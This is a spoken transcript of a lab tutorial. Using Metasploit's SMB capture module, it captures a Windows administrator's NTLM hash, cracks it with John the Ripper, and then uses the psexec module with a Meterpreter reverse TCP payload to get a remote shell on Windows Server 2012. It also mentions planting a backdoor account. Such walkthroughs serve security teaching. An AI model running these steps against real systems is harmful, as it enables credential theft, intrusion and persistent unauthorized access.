Hello, in this video I will show you how to create a reverse shell in Windows Server 2012 using Kali Linux and Metasploit.
The three operating systems are running in the same network in 192.168.1.0/24. The Kali Linux or the SMP server in Metasploit will act as a man in the middle, will capture the hash between the client Windows 7 and the server 2012. First, I want to make sure that the three boxes are in the same network and they can communicate with each other. So ipconfig, the IP address of the server is 192.168.1.10. I will ping 192.168.1.11 is the IP address of the client. Here I'm in the client side. ipconfig, and that has IP address of 192.168.1.11. I'll ping back the server to make sure that they can communicate. And they will make sure that the Windows 7 is a part of the domain in the darkside.com domain. So here I'm in Kali Linux. I will check the IP address fconfig and has IP address of 192.168.1.12. To launch Metasploit, all you have to do is type msf console. So here I'm in Kali Linux and I launch Metasploit. And this attack I will use the module is called auxiliary server capture and SMB. So I will type show options to see show options to see which options are mandatory or required to be filled out in the module. All the options that has yes is required, so look, all of them are filled out, except I will set the file that contain the hash, and I will store it in root, and I will call it hash, and it's look everything fine. So I will type exploit to run the module, and as you can see, SMB server has started and is listening for the communication between the client and server. So here I'm in the client side in Windows 7. So there are many software in Windows 7 in the client that they try to communicate back to the server, such as inventory software or management patch or desktop backup. All this type of or kind of software, they use the password and username to communicate back to the server. They use the administrator credentials to communicate with the server. So to simulate this, I will one batch command line for and start with the IP address of 8 and increment with 1 and stop in 13 and what do dir and dir 192.168.1.10. I mean start with 8 and increase with 1. This is the IP until when you reach the IP address of 192.168.10, we'll try to communicate back to the server, and we use the administrator credential. And this, at this point, we will capture the hash. So let it run. Go back to here in server 2012, and it's running. And we'll go back to Kali Linux here. So when the Windows 7 try to launch the command dir in the server, we'll use the credentials, the username and password. Here, as you can see, the SMB server has captured the username. The user is administrator, and the domain is DarkSide. And here the NTLM hash version 1, and you can see this is the time the attack has happened. So I'll go back to Windows 7. As you can see, he has there Windows 10, the client 11, and if we scroll back a little bit, we'll see the command has launched in the server. So go back here and Control C, and here if we do ls, we see this is the file that contains the hash. If we cat hash underscore NTLM, here you can see this is the administrator, the username, domain, and this is the NTLM hash. So the next step, I will use John River to crack use the format in NTLM and hash of file, and then John has cracked the hash, and here is the password, and here is the username. So now I have the password and the username. If you go cd, if you cd John is a hidden directory in root. So if it's ls, we cat john.path, as you can see here the hash and the password that's cracked. So right now we have the password, and we have the username. So I'll go back to Metasploit, and we use another module in Metasploit to create a reverse shell in server 2012. So to do this, I will use module is called exploit, and Windows and SMB, and it's called psexec. This psexec is created by Microsoft, allow the user to launch a command in a remote system. So this is module, and I will use also the payload is reverse TCP. So I will set payload, and will be Windows and I will use Metrometer and reverse TCP. So here I set the payload and use the module and wait until the Metasploit accept the command. Here we go. So I will say show option to see which option need to be filled out. Show options. So if I scroll up a little bit, and here it is. So this is the option need to be filled out. The remote host, this will be the server, and I have the SMP password, and I have SMP user administrator. So if I scroll a little bit down, so even we need to fill out the local host, and will be the IP address of the Kali Linux, and here is it by default 41444. This is the local port. So if I say set remote host, will be 192.168. Set remote host will be 192.168.1.10 IP address of the server, and I will set SMB password will be password 01, and I will set the SMB user will be 192.168.1. SMB user is administrator, and I'll set local host will be 192.168.1.12, and show option again to make sure that everything is working fine. All the mandatory options has filled out. So now I will say exploit to run the exploit, and wait until it create Metrometer in the server. Try again, exploit. Sometimes the first attempt not works. Here we go. As you can see, we get the Metrometer. Now we have full control in Windows in the server. So if we set shell to create a shell and the server, so as you can see here, we are in the system32 directory in the server. If I set system info, this is system info, so we can have bunch of information about the server. Here is the host name is good, the star, and the server 2012 R2, and the time was created, was installed 2012, 2014, and if I scroll down, it's running VMware and bunch of physical memory and virtual memory, and it's the domain darkside.com, and if I scroll back down, and here's the IP address for. So if I CD and another CD, so CD users, this is Windows, CD users and administrator and desktop. If I see there, so as you can see here, I have one folder, name folder, and I have batch files called software. If I go back to the server and I look at the desktop, here's the two folders I have. Now I'll show you, you can create a file or you can launch any command in the server. So if I want to just create a file called echo, this server has been hacked, and I will direct this in file called, for example, project, or whatever file name you want, because the attacker will not create a file name be obvious for the user. Probably will, if he want to create a file, or at this time maybe he can create a username as a backdoor, and so he can easily connect back to the server when he can has the reverse shell to the server. Here we go back to the server, and if you open the file the project has created here, and if you double click, and here this server has been hacked. So we would be able to create a file in the server.